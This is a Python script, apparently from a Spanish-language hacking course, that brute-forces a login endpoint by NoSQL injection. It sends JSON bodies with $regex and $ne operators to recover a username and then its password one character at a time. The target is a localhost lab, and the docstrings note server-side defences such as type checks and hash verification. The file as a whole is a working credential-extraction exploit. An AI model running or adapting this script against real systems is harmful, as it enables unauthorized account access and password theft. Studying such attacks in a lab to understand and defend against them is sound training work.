infosec/Introduccion-hacking-hack4u/tema_6_owasp/13_nosqli/nosqli.py

#!/usr/bin/env python
"""
Script para hacer un ataque de fuerza bruta a un login con NoSQL Injection.
Encuentra el primer usuario y su contraseña.
"""
import os
import requests
import signal
import string
import sys
import time
from pwn import *
from termcolor import colored
def def_handler(sig, frame):
    """Handle SIGINT: print the exit notice in red and stop with status 1.

    ``sig`` and ``frame`` are supplied by the ``signal`` module and are not used.
    """
    farewell = colored("\n\n[!] Saliendo...\n", "red")
    print(farewell)
    sys.exit(1)
# Route Ctrl+C through def_handler so the script exits with a message
# instead of a traceback.
signal.signal(signal.SIGINT, def_handler)

# Module-level settings.
# Target is a login endpoint on the local machine (lab setup, plain HTTP).
login_url = "http://localhost:4000/user/login"
# Candidate alphabet: ASCII letters and digits only. Values containing any
# other character cannot be fully reconstructed with this set.
characters = string.ascii_letters + string.digits
# Filled in by the entry point: username -> password.
users_passwords = {}
def makeNoSQLIuser():
    """Recover a username from the login endpoint one character at a time.

    Each request sends a JSON body whose ``username`` is a ``$regex`` operator
    anchored on the prefix found so far plus one candidate character, and
    whose ``password`` is a ``$ne`` operator. The response text
    "Logged in as user" is the success signal: when it appears, the candidate
    is appended to the prefix.

    Defensive reading: this only works if the endpoint passes the parsed JSON
    values into the database query without checking that they are plain
    strings. Validating field types (or rejecting operator keys starting with
    ``$``) on the server removes the signal; a burst of login requests with
    object-valued fields is also a clear pattern to alert on.

    Returns:
        The prefix accumulated after 30 positions (may be empty).
    """
    os.system("clear")

    found = ""
    attack_bar = log.progress(colored("Bruteando user", "magenta"))
    attack_bar.status(colored("Iniciando ataque", "cyan"))
    time.sleep(2)
    user_bar = log.progress(colored("User", "magenta"))

    # The header set never changes, so build it once.
    json_headers = {"Content-Type": "application/json"}

    for _ in range(30):
        for candidate in characters:
            post_data = '{"username":{"$regex":"^%s%s"},"password":{"$ne": "admin"}}' % (
                found, candidate
            )
            attack_bar.status(colored(post_data, "blue"))

            response = requests.post(login_url, data=post_data, headers=json_headers)
            if "Logged in as user" not in response.text:
                continue

            # Prefix confirmed by the server response; move to the next position.
            found += candidate
            user_bar.status(colored(found, "green"))
            break

    return found
def makeNoSQLIpass(user):
    """Recover the password stored for ``user`` one character at a time.

    The request body fixes ``username`` to the given string and sends
    ``password`` as a ``$regex`` operator anchored on the prefix found so far
    plus one candidate character. The response text "Logged in as user" is
    treated as confirmation of the candidate.

    Defensive reading: the value recovered is whatever string is stored in the
    password field, so this presumes the server matches the submitted value
    against that field inside the query. Verifying a password hash in
    application code, and requiring string-typed credentials, both prevent
    this.

    Args:
        user: Username to pin in the request body.

    Returns:
        The prefix accumulated after 50 positions (may be empty).
    """
    os.system("clear")

    password = ""
    attack_bar = log.progress(colored(f"Bruteando password de {user}", "magenta"))
    attack_bar.status(colored("Iniciando ataque", "cyan"))
    time.sleep(2)
    pass_bar = log.progress(colored("Password", "magenta"))

    # Both the username part of the body and the headers are loop-invariant.
    user_json = '{"username":"%s","password"' % user
    json_headers = {"Content-Type": "application/json"}

    for _ in range(50):
        for candidate in characters:
            regex_part = ':{"$regex":"^%s%s"}}' % (
                password, candidate
            )
            post_data = user_json + regex_part
            attack_bar.status(colored(post_data, "blue"))

            response = requests.post(login_url, data=post_data, headers=json_headers)
            if "Logged in as user" not in response.text:
                continue

            # Prefix confirmed by the server response; move to the next position.
            password += candidate
            pass_bar.status(colored(password, "green"))
            break

    return password
if __name__ == '__main__':
    # The username is recovered first; the password search is then pinned to it.
    user = makeNoSQLIuser()
    password = makeNoSQLIpass(user)
    users_passwords[user] = password

    os.system("clear")
    time.sleep(1)

    # Print every stored pair; this run only ever stores one.
    for u in users_passwords:
        p = users_passwords[u]
        print(colored(f"\n[+] {u}:{p}\n", "green"))